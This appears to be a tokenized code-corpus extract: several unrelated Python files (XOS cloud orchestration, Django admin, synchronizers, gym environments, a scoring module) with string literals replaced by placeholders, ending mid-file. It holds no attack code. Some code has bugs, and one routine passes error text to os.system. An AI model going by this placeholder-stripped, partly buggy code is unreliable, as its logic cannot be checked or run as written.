nova_default_security_group <EOL> files = { } <EOL> hints = { } <EOL> availability_zone_filter = None <EOL> if availability_zone is None or not availability_zone : <EOL> availability_zone_filter = '<STR_LIT>' <EOL> else : <EOL> availability_zone_filter = availability_zone <EOL> if hostname : <EOL> availability_zone_filter += '<STR_LIT>' % hostname <EOL> server = self . shell . nova . servers . create ( <EOL> name = name , <EOL> key_name = key_name , <EOL> flavor = flavor . id , <EOL> image = image_id , <EOL> security_group = security_group , <EOL> scheduler_hints = hints , <EOL> availability_zone = availability_zone_filter , <EOL> nics = nics , <EOL> networks = nics , <EOL> meta = metadata , <EOL> userdata = userdata ) <EOL> return server <EOL> def destroy_instance ( self , id ) : <EOL> if ( self . shell . nova . tenant == "<STR_LIT>" ) : <EOL> servers = self . shell . nova . servers . list ( search_opts = { "<STR_LIT>" : True } ) <EOL> else : <EOL> servers = self . shell . nova . servers . list ( ) <EOL> for server in servers : <EOL> if server . id == id : <EOL> result = self . shell . nova . servers . delete ( server ) <EOL> def update_instance_metadata ( self , id , metadata ) : <EOL> servers = self . shell . nova . servers . findall ( id = id ) <EOL> for server in servers : <EOL> self . shell . nova . servers . set_meta ( server , metadata ) <EOL> def delete_instance_metadata ( self , id , metadata ) : <EOL> servers = self . shell . nova . servers . findall ( id = id ) <EOL> for server in servers : <EOL> self . shell . nova . servers . delete_meta ( server , metadata ) </s>
<s> from django . contrib import admin <EOL> from services . cord . models import * <EOL> from django import forms <EOL> from django . utils . safestring import mark_safe <EOL> from django . contrib . auth . admin import UserAdmin <EOL> from django . contrib . admin . widgets import FilteredSelectMultiple <EOL> from django . contrib . auth . forms import ReadOnlyPasswordHashField <EOL> from django . contrib . auth . signals import user_logged_in <EOL> from django . utils import timezone <EOL> from django . contrib . contenttypes import generic <EOL> from suit . widgets import LinkedSelect <EOL> from core . admin import ServiceAppAdmin , SliceInline , ServiceAttrAsTabInline , ReadOnlyAwareAdmin , XOSTabularInline , ServicePrivilegeInline , TenantRootTenantInline , TenantRootPrivilegeInline <EOL> from core . middleware import get_request <EOL> from services . vtn . models import * <EOL> from services . cord . models import CordSubscriberRoot <EOL> from functools import update_wrapper <EOL> from django . contrib . admin . views . main import ChangeList <EOL> from django . core . urlresolvers import reverse <EOL> from django . contrib . admin . utils import quote <EOL> class VTNServiceForm ( forms . ModelForm ) : <EOL> privateGatewayMac = forms . CharField ( required = False ) <EOL> localManagementIp = forms . CharField ( required = False ) <EOL> ovsdbPort = forms . CharField ( required = False ) <EOL> sshPort = forms . CharField ( required = False ) <EOL> sshUser = forms . CharField ( required = False ) <EOL> sshKeyFile = forms . CharField ( required = False ) <EOL> mgmtSubnetBits = forms . CharField ( required = False ) <EOL> xosEndpoint = forms . CharField ( required = False ) <EOL> xosUser = forms . CharField ( required = False ) <EOL> xosPassword = forms . CharField ( required = False ) <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( VTNServiceForm , self ) . __init__ ( * args , ** kwargs ) <EOL> if self . instance : <EOL> self . 
fields [ '<STR_LIT>' ] . initial = self . instance . privateGatewayMac <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . localManagementIp <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . ovsdbPort <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshPort <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshUser <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . sshKeyFile <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . mgmtSubnetBits <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosEndpoint <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosUser <EOL> self . fields [ '<STR_LIT>' ] . initial = self . instance . xosPassword <EOL> def save ( self , commit = True ) : <EOL> self . instance . privateGatewayMac = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . localManagementIp = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . ovsdbPort = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshPort = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshUser = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . sshKeyFile = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . mgmtSubnetBits = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosEndpoint = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosUser = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> self . instance . xosPassword = self . cleaned_data . get ( "<STR_LIT>" ) <EOL> return super ( VTNServiceForm , self ) . 
save ( commit = commit ) <EOL> class Meta : <EOL> model = VTNService <EOL> class VTNServiceAdmin ( ReadOnlyAwareAdmin ) : <EOL> model = VTNService <EOL> form = VTNServiceForm <EOL> verbose_name = "<STR_LIT>" <EOL> verbose_name_plural = "<STR_LIT>" <EOL> list_display = ( "<STR_LIT>" , "<STR_LIT:name>" , "<STR_LIT>" ) <EOL> list_display_links = ( '<STR_LIT>' , '<STR_LIT:name>' , ) <EOL> fieldsets = [ ( None , { '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT:name>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:description>' , "<STR_LIT>" , "<STR_LIT>" , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , '<STR_LIT>' : [ '<STR_LIT>' ] } ) ] <EOL> readonly_fields = ( '<STR_LIT>' , ) <EOL> inlines = [ SliceInline , ServiceAttrAsTabInline , ServicePrivilegeInline ] <EOL> extracontext_registered_admins = True <EOL> user_readonly_fields = [ "<STR_LIT:name>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:description>" ] <EOL> suit_form_tabs = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) <EOL> suit_form_includes = ( <EOL> ) <EOL> def queryset ( self , request ) : <EOL> return VTNService . get_service_objects_by_user ( request . user ) <EOL> admin . site . register ( VTNService , VTNServiceAdmin ) </s>
<s> import os <EOL> import base64 <EOL> from datetime import datetime <EOL> from xos . config import Config <EOL> from xos . logger import Logger , logging <EOL> from synchronizers . base . steps import * <EOL> from django . db . models import F , Q <EOL> from core . models import * <EOL> from django . db import reset_queries <EOL> import json <EOL> import time <EOL> import pdb <EOL> import traceback <EOL> logger = Logger ( level = logging . INFO ) <EOL> def f7 ( seq ) : <EOL> seen = set ( ) <EOL> seen_add = seen . add <EOL> return [ x for x in seq if not ( x in seen or seen_add ( x ) ) ] <EOL> def elim_dups ( backend_str ) : <EOL> strs = backend_str . split ( '<STR_LIT:/>' ) <EOL> strs = map ( lambda x : x . split ( '<STR_LIT:(>' ) [ <NUM_LIT:0> ] , strs ) <EOL> strs2 = f7 ( strs ) <EOL> return '<STR_LIT:/>' . join ( strs2 ) <EOL> def deepgetattr ( obj , attr ) : <EOL> return reduce ( getattr , attr . split ( '<STR_LIT:.>' ) , obj ) <EOL> class InnocuousException ( Exception ) : <EOL> pass <EOL> class FailedDependency ( Exception ) : <EOL> pass <EOL> class SyncStep ( object ) : <EOL> """<STR_LIT>""" <EOL> slow = False <EOL> def get_prop ( prop ) : <EOL> try : <EOL> sync_config_dir = Config ( ) . sync_config_dir <EOL> except : <EOL> sync_config_dir = '<STR_LIT>' <EOL> prop_config_path = '<STR_LIT:/>' . join ( sync_config_dir , self . name , prop ) <EOL> return open ( prop_config_path ) . read ( ) . rstrip ( ) <EOL> def __init__ ( self , ** args ) : <EOL> """<STR_LIT>""" <EOL> dependencies = [ ] <EOL> self . driver = args . get ( '<STR_LIT>' ) <EOL> self . error_map = args . get ( '<STR_LIT>' ) <EOL> try : <EOL> self . soft_deadline = int ( self . get_prop ( '<STR_LIT>' ) ) <EOL> except : <EOL> self . soft_deadline = <NUM_LIT:5> <EOL> return <EOL> def fetch_pending ( self , deletion = False ) : <EOL> main_obj = self . observes <EOL> if ( not deletion ) : <EOL> objs = main_obj . objects . 
filter ( Q ( enacted__lt = F ( '<STR_LIT>' ) ) | Q ( enacted = None ) , Q ( lazy_blocked = False ) ) <EOL> else : <EOL> objs = main_obj . deleted_objects . all ( ) <EOL> return objs <EOL> def check_dependencies ( self , obj , failed ) : <EOL> for dep in self . dependencies : <EOL> peer_name = dep [ <NUM_LIT:0> ] . lower ( ) + dep [ <NUM_LIT:1> : ] <EOL> try : <EOL> peer_object = deepgetattr ( obj , peer_name ) <EOL> try : <EOL> peer_objects = peer_object . all ( ) <EOL> except AttributeError : <EOL> peer_objects = [ peer_object ] <EOL> except : <EOL> peer_objects = [ ] <EOL> if ( hasattr ( obj , '<STR_LIT>' ) ) : <EOL> try : <EOL> peer_objects = filter ( lambda o : o . controller == obj . controller , peer_objects ) <EOL> except AttributeError : <EOL> pass <EOL> if ( failed in peer_objects ) : <EOL> if ( obj . backend_status != failed . backend_status ) : <EOL> obj . backend_status = failed . backend_status <EOL> obj . save ( update_fields = [ '<STR_LIT>' ] ) <EOL> raise FailedDependency ( "<STR_LIT>" % ( obj . __class__ . __name__ , str ( getattr ( obj , "<STR_LIT>" , "<STR_LIT>" ) ) , peer_object . __class__ . __name__ , str ( getattr ( peer_object , "<STR_LIT>" , "<STR_LIT>" ) ) , failed . __class__ . __name__ , str ( getattr ( failed , "<STR_LIT>" , "<STR_LIT>" ) ) ) ) <EOL> def call ( self , failed = [ ] , deletion = False ) : <EOL> pending = self . fetch_pending ( deletion ) <EOL> for o in pending : <EOL> try : <EOL> reset_queries ( ) <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> sync_failed = False <EOL> try : <EOL> backoff_disabled = Config ( ) . observer_backoff_disabled <EOL> except : <EOL> backoff_disabled = <NUM_LIT:0> <EOL> try : <EOL> scratchpad = json . loads ( o . backend_register ) <EOL> if ( scratchpad ) : <EOL> next_run = scratchpad [ '<STR_LIT>' ] <EOL> if ( not backoff_disabled and next_run > time . time ( ) ) : <EOL> sync_failed = True <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . 
tologdict ( ) ) <EOL> pass <EOL> if ( not sync_failed ) : <EOL> try : <EOL> for f in failed : <EOL> self . check_dependencies ( o , f ) <EOL> if ( deletion ) : <EOL> self . delete_record ( o ) <EOL> o . delete ( purge = True ) <EOL> else : <EOL> self . sync_record ( o ) <EOL> o . enacted = datetime . now ( ) <EOL> scratchpad = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> o . backend_register = json . dumps ( scratchpad ) <EOL> o . backend_status = "<STR_LIT>" <EOL> o . save ( update_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except ( InnocuousException , Exception ) as e : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> force_error = False <EOL> try : <EOL> if ( o . backend_status . startswith ( '<STR_LIT>' ) ) : <EOL> force_error = False <EOL> str_e = '<STR_LIT>' % ( o . backend_status [ <NUM_LIT:4> : ] , str ( e ) ) <EOL> str_e = elim_dups ( str_e ) <EOL> else : <EOL> str_e = str ( e ) <EOL> except : <EOL> str_e = str ( e ) <EOL> if ( not str_e ) : <EOL> str_e = '<STR_LIT>' <EOL> try : <EOL> error = self . error_map . map ( str_e ) <EOL> except : <EOL> error = str_e <EOL> if isinstance ( e , InnocuousException ) and not force_error : <EOL> o . backend_status = '<STR_LIT>' % error <EOL> else : <EOL> o . backend_status = '<STR_LIT>' % error <EOL> cmd = '<STR_LIT>' % ( self . __class__ . __name__ , error ) <EOL> os . system ( cmd ) <EOL> try : <EOL> scratchpad = json . loads ( o . backend_register ) <EOL> scratchpad [ '<STR_LIT>' ] <EOL> except : <EOL> logger . log_exc ( "<STR_LIT>" , extra = o . tologdict ( ) ) <EOL> scratchpad = { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : <NUM_LIT:0> } <EOL> if ( scratchpad [ '<STR_LIT>' ] ) : <EOL> delay = scratchpad [ '<STR_LIT>' ] * <NUM_LIT> <EOL> if ( delay < <NUM_LIT> ) : <EOL> delay = <NUM_LIT> <EOL> scratchpad [ '<STR_LIT>' ] = time . time ( ) + delay <EOL> scratchpad [ '<STR_LIT>' ] += <NUM_LIT:1> <EOL> o . backend_register = json . 
dumps ( scratchpad ) <EOL> if ( o . pk ) : <EOL> try : <EOL> o . backend_status = o . backend_status [ : <NUM_LIT> ] <EOL> o . save ( update_fields = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> except : <EOL> print "<STR_LIT>" <EOL> pass <EOL> sync_failed = True <EOL> if ( sync_failed ) : <EOL> failed . append ( o ) <EOL> return failed <EOL> def sync_record ( self , o ) : <EOL> return <EOL> def delete_record ( self , o ) : <EOL> return <EOL> def __call__ ( self , ** args ) : <EOL> return self . call ( ** args ) </s>
<s> import os <EOL> import base64 <EOL> from django . db . models import F , Q <EOL> from xos . config import Config <EOL> from ec2_observer . syncstep import SyncStep <EOL> from core . models . site import * <EOL> from ec2_observer . awslib import * <EOL> import pdb <EOL> class SyncSites ( SyncStep ) : <EOL> provides = [ Site ] <EOL> requested_interval = <NUM_LIT> <EOL> def fetch_pending ( self , deletion ) : <EOL> if ( deletion ) : <EOL> return [ ] <EOL> deployment = Deployment . objects . filter ( Q ( name = "<STR_LIT>" ) ) [ <NUM_LIT:0> ] <EOL> current_site_deployments = SiteDeployment . objects . filter ( Q ( deployment = deployment ) ) <EOL> zone_ret = aws_run ( '<STR_LIT>' ) <EOL> zones = zone_ret [ '<STR_LIT>' ] <EOL> available_sites = [ zone [ '<STR_LIT>' ] for zone in zones ] <EOL> site_names = [ sd . site . name for sd in current_site_deployments ] <EOL> new_site_names = list ( set ( available_sites ) - set ( site_names ) ) <EOL> new_sites = [ ] <EOL> for s in new_site_names : <EOL> site = Site ( name = s , <EOL> login_base = s , <EOL> site_url = "<STR_LIT>" , <EOL> enabled = True , <EOL> is_public = True , <EOL> abbreviated_name = s ) <EOL> new_sites . append ( site ) <EOL> return new_sites <EOL> def sync_record ( self , site ) : <EOL> site . save ( ) </s>
<s> from . model_policy_Slice import * <EOL> from . model_policy_Instance import * <EOL> from . model_policy_User import * <EOL> from . model_policy_Network import * <EOL> from . model_policy_Site import * <EOL> from . model_policy_SitePrivilege import * <EOL> from . model_policy_SlicePrivilege import * <EOL> from . model_policy_ControllerSlice import * <EOL> from . model_policy_ControllerSite import * <EOL> from . model_policy_ControllerUser import * <EOL> from . model_policy_Controller import * <EOL> from . model_policy_Image import * </s>
<s> import os <EOL> import sys <EOL> import base64 <EOL> import traceback <EOL> from django . db . models import F , Q <EOL> from xos . config import Config , XOS_DIR <EOL> from synchronizers . base . syncstep import SyncStep <EOL> from core . models import Service <EOL> from services . requestrouter . models import ServiceMap <EOL> from xos . logger import Logger , logging <EOL> parentdir = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT:..>" ) <EOL> sys . path . insert ( <NUM_LIT:0> , parentdir ) <EOL> from rrlib import RequestRouterLibrary <EOL> from configurationPush import ConfigurationPush <EOL> import rrlib_config <EOL> logger = Logger ( level = logging . INFO ) <EOL> class SyncServiceMap ( SyncStep , RequestRouterLibrary , ConfigurationPush ) : <EOL> provides = [ ServiceMap ] <EOL> requested_interval = <NUM_LIT:0> <EOL> def __init__ ( self , ** args ) : <EOL> SyncStep . __init__ ( self , ** args ) <EOL> RequestRouterLibrary . __init__ ( self ) <EOL> ConfigurationPush . __init__ ( self ) <EOL> def fetch_pending ( self ) : <EOL> try : <EOL> ret = ServiceMap . objects . filter ( Q ( enacted__lt = F ( '<STR_LIT>' ) ) | Q ( enacted = None ) ) <EOL> return ret <EOL> except Exception , e : <EOL> traceback . print_exc ( ) <EOL> return None <EOL> def sync_record ( self , servicemap ) : <EOL> try : <EOL> print "<STR_LIT>" % self . get_servicemap_uid ( servicemap ) <EOL> self . gen_dnsredir_serviceconf ( servicemap ) <EOL> self . gen_dnsdemux_serviceconf ( servicemap ) <EOL> service_uid = self . get_servicemap_uid ( servicemap ) <EOL> self . config_push ( service_uid , rrlib_config . REDIR_USER , XOS_DIR + "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . config_push ( service_uid , rrlib_config . DEMUX_USER , XOS_DIR + "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . teardown_temp_configfiles ( service_uid ) <EOL> except Exception , e : <EOL> traceback . 
print_exc ( ) <EOL> return False <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> sv = SyncServiceMap ( ) <EOL> recs = sv . fetch_pending ( ) <EOL> for rec in recs : <EOL> sv . sync_record ( rec ) </s>
import os
import pdb
import sys
import tempfile
sys.path.append("<STR_LIT>")
from translator.toscalib.tosca_template import ToscaTemplate
from core.models import User, Deployment, DeploymentRole
from xosresource import XOSResource


class XOSDeploymentRole(XOSResource):
    """Resource adapter that maps a TOSCA node onto the DeploymentRole
    model; all of the actual work is inherited from XOSResource."""

    provides = "<STR_LIT>"
    xos_model = DeploymentRole
    name_field = "<STR_LIT>"

    def get_xos_args(self):
        # No extra arguments beyond what the base class collects.
        return super(XOSDeploymentRole, self).get_xos_args()

    def delete(self, obj):
        # Deletion requires no special handling either.
        super(XOSDeploymentRole, self).delete(obj)
import os
import pdb
import sys
import tempfile
sys.path.append("<STR_LIT>")
from translator.toscalib.tosca_template import ToscaTemplate
from services.vrouter.models import VRouterService
from service import XOSService


class XOSVRouterService(XOSService):
    """Resource adapter that maps a TOSCA node onto the VRouterService
    model; behavior comes entirely from the XOSService base class."""
    # TOSCA node type handled by this adapter.
    provides = "<STR_LIT>"
    # Model class this adapter creates/updates.
    xos_model = VRouterService
    # NOTE(review): presumably the properties copied from the TOSCA node
    # into the model (name-derived) -- confirm against XOSService.
    copyin_props = ["<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT>"]
from django.contrib.admin.templatetags.admin_modify import *
from django.contrib.admin.templatetags.admin_modify import submit_row as original_submit_row


@register.inclusion_tag('<STR_LIT>', takes_context=True)
def submit_row(context):
    """Wrap Django's stock submit_row inclusion tag, allowing the
    template context to override selected entries while keeping the
    stock values as defaults."""
    ctx = original_submit_row(context)
    overrides = {
        '<STR_LIT>': context.get('<STR_LIT>', ctx['<STR_LIT>']),
        '<STR_LIT>': context.get('<STR_LIT>', ctx['<STR_LIT>']),
        '<STR_LIT>': context.get('<STR_LIT>', ctx['<STR_LIT>']),
        '<STR_LIT>': context.get("<STR_LIT>", None),
    }
    ctx.update(overrides)
    return ctx
<s> '''<STR_LIT>''' <EOL> import logging ; _L = logging . getLogger ( '<STR_LIT>' ) <EOL> from datetime import timedelta <EOL> import multiprocessing <EOL> import signal <EOL> import traceback <EOL> import time <EOL> import os <EOL> import os . path <EOL> import json <EOL> from . import process_one , compat <EOL> JOB_TIMEOUT = timedelta ( hours = <NUM_LIT:9> ) <EOL> class JobTimeoutException ( Exception ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , jobstack = [ ] ) : <EOL> super ( JobTimeoutException , self ) . __init__ ( ) <EOL> self . jobstack = jobstack <EOL> def timeout ( timeout ) : <EOL> '''<STR_LIT>''' <EOL> def decorate ( f ) : <EOL> def timeout_handler ( signum , frame ) : <EOL> raise JobTimeoutException ( traceback . format_stack ( ) ) <EOL> def new_f ( * args , ** kwargs ) : <EOL> old_handler = signal . signal ( signal . SIGALRM , timeout_handler ) <EOL> signal . alarm ( timeout ) <EOL> result = f ( * args , ** kwargs ) <EOL> signal . signal ( signal . SIGALRM , old_handler ) <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> return result <EOL> if compat . PY2 : <EOL> new_f . func_name = f . func_name <EOL> else : <EOL> new_f . __name__ = f . __name__ <EOL> return new_f <EOL> return decorate <EOL> def setup_logger ( logfile = None , log_level = logging . DEBUG , log_stderr = True , log_config_file = "<STR_LIT>" ) : <EOL> '''<STR_LIT>''' <EOL> openaddr_logger = logging . getLogger ( '<STR_LIT>' ) <EOL> log_format = '<STR_LIT>' <EOL> openaddr_logger . setLevel ( logging . DEBUG ) <EOL> for old_handler in openaddr_logger . handlers : <EOL> openaddr_logger . removeHandler ( old_handler ) <EOL> mp_logger = multiprocessing . get_logger ( ) <EOL> mp_logger . propagate = True <EOL> log_config_file = os . path . expanduser ( log_config_file ) <EOL> if os . path . exists ( log_config_file ) : <EOL> log_config_dict = json . load ( file ( log_config_file ) ) <EOL> log_config_dict [ '<STR_LIT>' ] = False <EOL> logging . config . 
dictConfig ( log_config_dict ) <EOL> openaddr_logger . info ( "<STR_LIT>" , log_config_file ) <EOL> else : <EOL> mp_logger . setLevel ( log_level ) <EOL> everything_logger = logging . getLogger ( ) <EOL> if log_stderr : <EOL> handler1 = logging . StreamHandler ( ) <EOL> handler1 . setLevel ( log_level ) <EOL> handler1 . setFormatter ( logging . Formatter ( log_format . format ( '<STR_LIT>' ) ) ) <EOL> everything_logger . addHandler ( handler1 ) <EOL> if logfile : <EOL> handler2 = logging . FileHandler ( logfile , mode = '<STR_LIT:w>' ) <EOL> handler2 . setLevel ( log_level ) <EOL> handler2 . setFormatter ( logging . Formatter ( log_format . format ( '<STR_LIT>' ) ) ) <EOL> everything_logger . addHandler ( handler2 ) </s>
# Environment registrations.  Each register() call adds an environment
# spec to the global registry so it can later be instantiated with
# make(<id>).
from gym.envs.registration import registry, register, make, spec

register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
# kwargs are forwarded to the environment constructor.
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={'<STR_LIT>': <NUM_LIT:2>},
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={'<STR_LIT>': <NUM_LIT:3>},
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=<NUM_LIT>,
)
# No reward_threshold on the next two registrations.
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
    reward_threshold=-<NUM_LIT:100>
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={'<STR_LIT>': '<STR_LIT>'},
    timestep_limit=<NUM_LIT:100>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={'<STR_LIT>': '<STR_LIT>'},
    timestep_limit=<NUM_LIT:200>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:100>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:200>,
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    timestep_limit=<NUM_LIT:50>
)
# The next eight environments have no explicit timestep limit.
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
)

# Register one environment per (game, observation type) combination.
for game in ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>',
             '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>']:
    for obs_type in ['<STR_LIT:image>', '<STR_LIT>']:
        # Environment name derived from the game id, one capitalized
        # word per underscore-separated token.
        name = '<STR_LIT>'.join([g.capitalize() for g in game.split('<STR_LIT:_>')])
        if obs_type == '<STR_LIT>':
            name = '<STR_LIT>'.format(name)
        register(
            id='<STR_LIT>'.format(name),
            entry_point='<STR_LIT>',
            kwargs={'<STR_LIT>': game, '<STR_LIT>': obs_type},
            timestep_limit=<NUM_LIT>,
        )

# Two registrations parameterized entirely through kwargs.
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': <NUM_LIT:9>,
    },
)
register(
    id='<STR_LIT>',
    entry_point='<STR_LIT>',
    kwargs={
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': '<STR_LIT>',
        '<STR_LIT>': <NUM_LIT>,
    },
)
<s> import numpy as np <EOL> from gym import utils <EOL> from gym . envs . mujoco import mujoco_env <EOL> class SwimmerEnv ( mujoco_env . MujocoEnv , utils . EzPickle ) : <EOL> def __init__ ( self ) : <EOL> mujoco_env . MujocoEnv . __init__ ( self , '<STR_LIT>' , <NUM_LIT:4> ) <EOL> utils . EzPickle . __init__ ( self ) <EOL> self . ctrl_cost_coeff = <NUM_LIT> <EOL> self . finalize ( ) <EOL> def _step ( self , a ) : <EOL> xposbefore = self . model . data . qpos [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> self . do_simulation ( a , self . frame_skip ) <EOL> xposafter = self . model . data . qpos [ <NUM_LIT:0> , <NUM_LIT:0> ] <EOL> reward_fwd = ( xposafter - xposbefore ) / self . dt <EOL> reward_ctrl = - self . ctrl_cost_coeff * np . square ( a ) . sum ( ) <EOL> reward = reward_fwd + reward_ctrl <EOL> ob = self . _get_obs ( ) <EOL> return ob , reward , False , dict ( reward_fwd = reward_fwd , reward_ctrl = reward_ctrl ) <EOL> def _get_obs ( self ) : <EOL> qpos = self . model . data . qpos <EOL> qvel = self . model . data . qvel <EOL> return np . concatenate ( [ <EOL> qpos . flat [ <NUM_LIT:2> : ] , <EOL> qvel . flat <EOL> ] ) <EOL> def _reset ( self ) : <EOL> self . model . data . qpos = self . init_qpos + np . random . uniform ( size = ( self . model . nq , <NUM_LIT:1> ) , low = - <NUM_LIT> , high = <NUM_LIT> ) <EOL> self . model . data . qvel = self . init_qvel + np . random . uniform ( size = ( self . model . nv , <NUM_LIT:1> ) , low = - <NUM_LIT> , high = <NUM_LIT> ) <EOL> self . reset_viewer_if_necessary ( ) <EOL> return self . _get_obs ( ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> import requests <EOL> import gym <EOL> def score_from_remote ( url ) : <EOL> result = requests . get ( url ) <EOL> parsed = result . json ( ) <EOL> episode_lengths = parsed [ '<STR_LIT>' ] <EOL> episode_rewards = parsed [ '<STR_LIT>' ] <EOL> timestamps = parsed [ '<STR_LIT>' ] <EOL> initial_reset_timestamp = parsed . get ( '<STR_LIT>' , timestamps [ <NUM_LIT:0> ] ) <EOL> env_id = parsed [ '<STR_LIT>' ] <EOL> spec = gym . spec ( env_id ) <EOL> return score_from_merged ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , spec . trials , spec . reward_threshold ) <EOL> def score_from_merged ( episode_lengths , episode_rewards , timestamps , initial_reset_timestamp , trials , reward_threshold ) : <EOL> """<STR_LIT>""" <EOL> episode_rewards = np . array ( episode_rewards , dtype = '<STR_LIT>' ) <EOL> episode_t_value = timestep_t_value = mean = error = None <EOL> seconds_to_solve = seconds_in_total = None <EOL> if len ( timestamps ) > <NUM_LIT:0> : <EOL> seconds_in_total = 